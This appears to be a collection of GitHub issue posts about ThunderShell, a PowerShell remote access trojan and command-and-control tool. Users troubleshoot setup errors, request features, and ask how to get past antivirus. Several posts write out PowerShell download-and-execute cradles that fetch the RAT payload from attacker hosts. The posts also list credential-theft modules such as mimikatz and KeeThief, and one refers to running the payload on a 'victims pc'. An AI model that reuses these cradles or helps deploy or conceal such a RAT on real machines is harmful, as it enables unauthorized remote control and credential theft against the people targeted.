Inject the PowerShell RAT into another process.

Hello! Any plans to implement a download capability in order to pull down files from a target? Very nice RAT, btw.

PS-RemoteShell.ps1 cannot be provided from this url "http://ringzer0team.com/PS-RemoteShell.ps1"

no bypass AV (defender)

what can you ask to bypass antiviruses?

From Mr-Un1k0d3r

Each command only has one entry now.
We need to rework that to support multiple entries.

The wiki needs updated to match the included default.json port of 8080 instead of 8443.

Hello
When starting server I got this:

• Serving Flask app "core.gui" (lazy loading)
• Environment: production
  WARNING: Do not use the development server in a production environment.
  Use a production WSGI server instead.
• Debug mode: off
  Version 2.1.2 (11/01/2019)
  This WARNING is a problem or it's just warning for attention and ThunderShell works good?

Why did this error occur?

C:\Windows\system32>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString("http://192.168.1.100/PS-RemoteShell.ps1"); PS-RemoteShell.ps1 -ip 192.168.1.100 -port 8080 -Key test -Delay 2000
No linha:1 caractere:47

• IEX (New-Object Net.WebClient).DownloadString(http://192.168.1.100/PS ...

•                                           ~
  

')' ausente na chamada do método.
No linha:1 caractere:86

• ... ient).DownloadString(http://192.168.1.100/PS-RemoteShell.ps1); PS-Rem ...

•                                                             ~
  

Token ')' inesperado na expressão ou instrução.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall

Implement different delivery methods.

All the configuration file i configured it carefully.
i ran it on parrot security os 14 vmware under the windows 10 home host machine.
here is my configuration file:
{
"aliases": {
"myalias": ""
},
"callback-url": "https://192.168.43.110:8080",
"cli-sync-delay": 5,
"encryption-key": "NJtfJBxrxYsFpSQcLStlZIkG",
"gui-host": "192.168.43.110",
"gui-https-cert-path": "cert.pem",
"gui-https-enabled": "off",
"gui-port": "13337",
"http-default-404": "default.html",
"http-download-path": "cat.png",
"http-host": "192.168.43.110",
"http-port": 8080,
"http-profile": "profile.json",
"http-server": "Microsoft-IIS/7.5",
"https-cert-path": "cert.pem",
"https-enabled": "off",
"max-output-timeout": 5,
"redis-host": "localhost",
"redis-port": 6379,
"server-password": "QhGCkBuIFKlNCrqVRYcSNwxgDyvrFUkh"
}

On the server side:

After i run "sudo python3 ThunderShell.py default.json MrUn1k0d3r"
The cli is showing the UUID username and password with the web GUI login without any error.
Then i login and it show gui as normally.

On the client side:

I test on windows 10 and download ps file and run the command "powershell -exec bypass import-module .\payloadname.ps1"

After press enter the terminal is freeze and show nothing.

I checked on the attacker side, on the client area is blank.

I also download an exe file and execute it on both windows 7 and 10 but it showing the blank terminal...

so what is the problem?

cant run long commands like "reg add" anyway
and
i got error in running fetch command

Hi. How can I run payload ps on Windows 7 powershell v2? Do you have any ideas? It doesn't work on Windows 7.

Hi

In ubuntu works like a charm, in kali I get the following error:

Exception happened during processing of request from ('192.168.1.30', 53401)
Traceback (most recent call last):
  File "/usr/lib/python3.7/socketserver.py", line 316, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python3.7/socketserver.py", line 347, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python3.7/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/opt/ThunderShell/core/httpd.py", line 37, in __init__
    self.rc4 = RC4(self.rc4_key)
  File "/opt/ThunderShell/core/rc4.py", line 12, in __init__
    self.rc4 = ARC4.new(key)
  File "/usr/local/lib/python3.7/dist-packages/Crypto/Cipher/ARC4.py", line 132, in new
    return ARC4Cipher(key, *args, **kwargs)
  File "/usr/local/lib/python3.7/dist-packages/Crypto/Cipher/ARC4.py", line 60, in __init__
    result = _raw_arc4_lib.ARC4_stream_init(c_uint8_ptr(key),
  File "/usr/local/lib/python3.7/dist-packages/Crypto/Util/_raw_api.py", line 145, in c_uint8_ptr
    raise TypeError("Object type %s cannot be passed to C code" % type(data))
TypeError: Object type <class 'str'> cannot be passed to C code

Also in a clean kali install I get similar errors related to rc4 with an error valueerror: _ARC4 key cannot be null.

As I understand its a library dependency problem, any ideas??

P.S In latest default.json file the "}" at the end of file is missing

Hello
Not working HTTPS. When I connected the GUI via HTTPS, I got it:

Ubuntu 18.04.2 LTS /64
Python 3.6.7
Flask 1.0.2
Gevent 1.4.0

Hello.When the .exe is opened in victims pc its running for a little and crashes.What's the porblem ?

Hey. After starting the program and launching the payload, I enter the command for the test ls c: \, an error appears.

Exception in thread Thread-1:
Traceback (most recent call last):
File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
self.run()
File "/usr/lib/python3.6/threading.py", line 864, in run
self._target(*self._args, **self._kwargs)
File "/home/alex/tools/ThunderShell/core/sync.py", line 66, in start_cmd_sync_thread
guid = sync.get_cmd_output(guid)
File "/home/alex/tools/ThunderShell/core/sync.py", line 38, in get_cmd_output
data = b64decode(self.redis.get_data(item)).decode()
File "/usr/lib/python3.6/base64.py", line 87, in b64decode
return binascii.a2b_base64(s)
binascii.Error: Incorrect padding

Sorry bout this bit lame tho :-
Getting this error while executing in my VM :)

Unexpected token ':$($Domain)$($env:username)' in expression or statement.
At line:19 char:59

•     return $($Arch) - $($Target):$($Domain)\$($env:username) <<<<
  

  • CategoryInfo : ParserError: (:$($Domain)$($env:username):String) [], ParentContainsErrorRecordExceptio
    n
  • FullyQualifiedErrorId : UnexpectedToken

The term 'PS-RemoteShell' is not recognized as the name of a cmdlet, function, script file, or operable program. Check
the spelling of the name, or if a path was included, verify that the path is correct and try again.
At line:1 char:130

• powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://185.159.82.240/PS-RemoteShell.ps1'); PS
  -RemoteShell <<<< -ip 185.159.82.240 -port 8080 -Key test -Delay 2000
  • CategoryInfo : ObjectNotFound: (PS-RemoteShell:String) [], CommandNotFoundException
  • FullyQualifiedErrorId : CommandNotFoundException

Can you please point out if I am missing something ?

Thanks in advance :)
Always been a huge admirer of your codes

Hello,

By using RC4, the tool is susceptible to a Sweet32 birthday attack. I would avoid RC4, DES, and CBC ciphers. I would recommend using something stronger.

https://sweet32.info

From Mr-Un1k0d3r

@morendzo mostly worked on the web part of it which is also going to be heavily modified soon.

When choosing the PowerShell payload, the file that is downloaded contain the extension .ps instead of .ps1.

The 'read' command should be able to read a text file in the current directory instead of having to provide the full directory path.

Create a client version in GO.

Hello, first of all thanks for your project it really helpful for me to do a research on rat.

I have installed this project on kali linux 2018.4 as my attacker server and windows 10 as my target.

my issue is when i interacted the shell from ps or exe file successfully on the windows 10 machine, i cannot access any command from the shell GUI (the button send is not working).

From the terminal i can use the command normally (ex: ipconfig)

Note: the screenshot above is only show the command that i type from terminal.

is there a bug or my system fault?

Thanks,

Hello

I was running version 2.0.2 and I upgraded to the latest version and I have some issues.
When I tried to start the application I got a python syntax error in core/gui.py "TypeError: init() got an unexpected keyword argument 'static_path'". I completely removed the static_path argument and the server started.

Also the generated payloads are always pointing to http://1.1.1.1:1111

thanks

Add in default.json:
"autocommand": "whoami",

Add in core/parser.py:
in init:
self.autocommand = self.config.get("autocommand")

in register, last line of the function:
self.output = self.autocommand

There is a typo in cli.py line 55:
readline.parse_and_bind("tab: complete")
should be:
readline.parse_and_bind("tab:complete")

https://github.com/Mr-Un1k0d3r/ThunderShell/blob/master/core/cli.py

powershell -exec bypass -file GTPNOuLxIXkV.ps1
Exception calling "ELbc" with "3" argument(s): "The operation has timed out"
At C:\Users\Agent\Downloads\GTPNOuLxIXkV.ps1:1 char:14289

• ... age CSharp; [NUgvFrTpmsBzLxV.MTBqhB]::ELbc("https://test:8080 ...

•             ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  

  • CategoryInfo : NotSpecified: (:) [], MethodInvocationException
  • FullyQualifiedErrorId : WebException

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://test:8080/cat.png')
Exception calling "DownloadString" with "1" argument(s): "Unable to connect to the remote server"
At line:1 char:1

• IEX (New-Object Net.WebClient).DownloadString('http://test:80 ...

•   + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : WebException
  

Like the title says cannot send remote commands.

The error:

1. Operating system used to compile and run ThunderShell
   Kali Linux 2017.2

2. Victim machine
   Windows 10 pro x64 version 1703

3. Shell command / script / task you were trying to run.
   Running whoami command .
   

After getting a shell and typing help, the menu that comes up is poorly formatted.
Suggest using courier font, which has a fixed width.
Also suggest putting the commands in alphabetical order.

A place to store knowledge for future capabilities.

https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/

https://github.com/Strong-IT-IBK/Conferences-Slides/blob/main/DeepSec2020_EPP_Unhooking.pdf

https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/

Hey.
I'm trying to install the program on Ubuntu 18.04 64, python3.7.3, pip3, pycrypto. Errors appear during installation:
cannot import name '_ARC4' from 'Crypto.Cipher' (/usr/lib/python3/dist-packages/Crypto/Cipher/__init__.py)
E: Unable to locate package python3.7-pip
E: Couldn't find any package by glob 'python3.7-pip'
E: Couldn't find any package by regex 'python3.7-pip'

Tell me how you can solve the problem?

Hello, I met a bug when the implant connects to my C2 Server.

The traceback :

The error seems to be triggered during encoding. So I add .encode("utf-8") in ThunderShell/core/rc4.py

Then the bug disappeared :)

May need a fix? Thank you

After reviewing the following article, there appears to be some tools that I'm not seeing when I issue the 'help' command.

https://www.kitploit.com/2017/09/thundershell-powershell-based-rat.html

powerup                PowerUp tool set
wmiexec                Remote-WmiExecute utility
searchevent            Search-EventForUser utility
keethief               KeeThief tool set (Get-KeePassDatabaseKey)
mimikatz               Invoke-Mimikatz utility
inveigh                Invoke-Inveigh utility
powerview              PowerView tool set

Implement in-memory protection using C# and push / pull code to avoid sending data several times

Hi!
I installed ThunderShell, everything worked fine (console application and gui). After a few days of work, an error appears when I enter through the gui. I made a reinstall, the problem appeared again after several days of work.

ERROR in app: Exception on /api/listShells [GET]
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/flask/app.py", line 1982, in wsgi_app
response = self.full_dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1614, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/lib/python3/dist-packages/flask/app.py", line 1517, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/lib/python3/dist-packages/flask/_compat.py", line 33, in reraise
raise value
File "/usr/lib/python3/dist-packages/flask/app.py", line 1612, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1598, in dispatch_request
return self.view_functionsrule.endpoint
File "/home/gnom13/tools/ThunderShell/core/webserver.py", line 149, in list_shells
return render_template("shells.html", shells=app.get_shells(), uid=app.get_session_uid())
File "/home/gnom13/tools/ThunderShell/core/webapi.py", line 211, in get_shells
prompt = self.redis.get_prompt(shell.split(":")[0]).decode()
AttributeError: 'NoneType' object has no attribute 'decode'
[2019-04-01 09:00:58,857] ERROR in app: Exception on /api/listShells [GET]
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/flask/app.py", line 1982, in wsgi_app
response = self.full_dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1614, in full_dispatch_request
rv = self.handle_user_exception(e)
File "/usr/lib/python3/dist-packages/flask/app.py", line 1517, in handle_user_exception
reraise(exc_type, exc_value, tb)
File "/usr/lib/python3/dist-packages/flask/_compat.py", line 33, in reraise
raise value
File "/usr/lib/python3/dist-packages/flask/app.py", line 1612, in full_dispatch_request
rv = self.dispatch_request()
File "/usr/lib/python3/dist-packages/flask/app.py", line 1598, in dispatch_request
return self.view_functionsrule.endpoint
File "/home/gnom13/tools/ThunderShell/core/webserver.py", line 149, in list_shells
return render_template("shells.html", shells=app.get_shells(), uid=app.get_session_uid())
File "/home/gnom13/tools/ThunderShell/core/webapi.py", line 211, in get_shells
prompt = self.redis.get_prompt(shell.split(":")[0]).decode()
AttributeError: 'NoneType' object has no attribute 'decode'

having issues running it...

C:\Windows\system32>C:\Windows\System32\ThunderShell-master\ThunderShell.py
Traceback (most recent call last):
File "C:\Windows\System32\ThunderShell-master\ThunderShell.py", line 17, in
from core.utils import Utils
File "C:\Windows\System32\ThunderShell-master\core\utils.py", line 11, in
import ssl
File "C:\Users\BEST\AppData\Local\Programs\Python\Python37\lib\ssl.py", line 9
8, in
import _ssl # if we can't import it, let the error propagate
ImportError: DLL load failed: The specified module could not be found.

C:\Windows\system32>

how does one create a payload, the current structure is not working

When I tried to run ThunderShell.py, I got:
sudo python3 ThunderShell.py

         .#"    =[ ThunderShell version 3.1.2 | RingZer0 Team ]=
       .##"
    .###"       __       __    _________    __            __
   ###P        ###|     ###|  ##########|  ###|          ###|
 d########"    ###|     ###|  ###|         ###|          ###|
 ****####"     ###|_____###|  ###|__       ###|          ###|
   .###"       ############|  ######|      ###|          ###|
  .##"         ###|     ###|  ###|         ###|          ###|
 .#"           ###|     ###|  ###|______   ###|_______   ###|_______
."             ###|     ###|  ##########|  ###########|  ###########|

[-] Missing the config file or username

Usage: ThunderShell.py config username (optional -nohttpd, -nogui)

The script does not properly check for dependencies.

Would be much more reliable if you included a requirements.txt.

Hi, I can not solve the problem, the error appears after entering the command and receiving a response.

Exception in thread Thread-1:
Traceback (most recent call last):
  File "/usr/lib/python3.6/threading.py", line 916, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3.6/threading.py", line 864, in run
    self._target(*self._args, **self._kwargs)
  File "/home/dronlab/tools/ThunderShell/core/sync.py", line 66, in start_cmd_sync_thread
    guid = sync.get_cmd_output(guid)
  File "/home/dronlab/tools/ThunderShell/core/sync.py", line 38, in get_cmd_output
    data = b64decode(self.redis.get_data(item)).decode()
  File "/usr/lib/python3.6/base64.py", line 87, in b64decode
    return binascii.a2b_base64(s)
binascii.Error: Incorrect padding